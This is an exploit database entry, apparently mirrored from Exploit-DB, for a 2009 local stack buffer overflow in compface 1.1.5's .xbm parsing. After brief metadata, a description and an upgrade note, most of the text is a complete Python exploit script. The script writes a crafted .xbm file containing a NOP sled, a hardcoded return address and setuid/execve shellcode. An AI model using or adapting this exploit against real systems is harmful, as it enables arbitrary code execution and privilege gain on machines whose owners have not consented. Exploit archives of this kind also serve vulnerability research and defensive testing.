Compface '.xbm' Local Buffer Overflow Exploit

vendor:

compface

by:

His0k4

7,2

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: compface

Affected Version From: 1.1.5

Affected Version To: 1.1.5

Patch Exists: YES

Related CWE: N/A

CPE: compface

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 9.04

2009

Compface ‘.xbm’ Local Buffer Overflow Exploit

Compface is vulnerable to a local buffer overflow vulnerability due to insufficient bounds checking when processing .xbm files. This vulnerability can be exploited by an attacker to execute arbitrary code with the privileges of the user running the application. The vulnerability is caused by the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted .xbm file. This exploit code creates a malicious .xbm file that contains shellcode which is executed when the file is processed by compface.

Mitigation:

Upgrade to the latest version of compface.

Source

Exploit-DB raw data:

#!/usr/bin/python
#[*] Exploit     :      	Compface '.xbm' Local Buffer Overflow Exploit
#[*] Affected	 :		compface 1.1.5
#[*] Tested on   :   		Ubuntu 9.04 (without stack randomization)
#[*] Refer	 :		bid/35863
#[*] Exploit     : 		His0k4

#[*] Use : $compface exploit.xbm out

#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
shellcode=(
"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f"
"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b"
"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50"
"\x45\x5a\x41\x41")

payload =  "#define noname_width 48\r\n"
payload += "#define noname_height 48\r\n"
payload += "static\r\n"
payload += "\x90"*180
payload += "\x80\xf4\xff\xbf" #$esp+10h
payload += "\x90"*16
payload += shellcode
payload += "\r\n"
payload += "char = {\r\n"

try:
    out_file = open("exploit.xbm","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-07-30]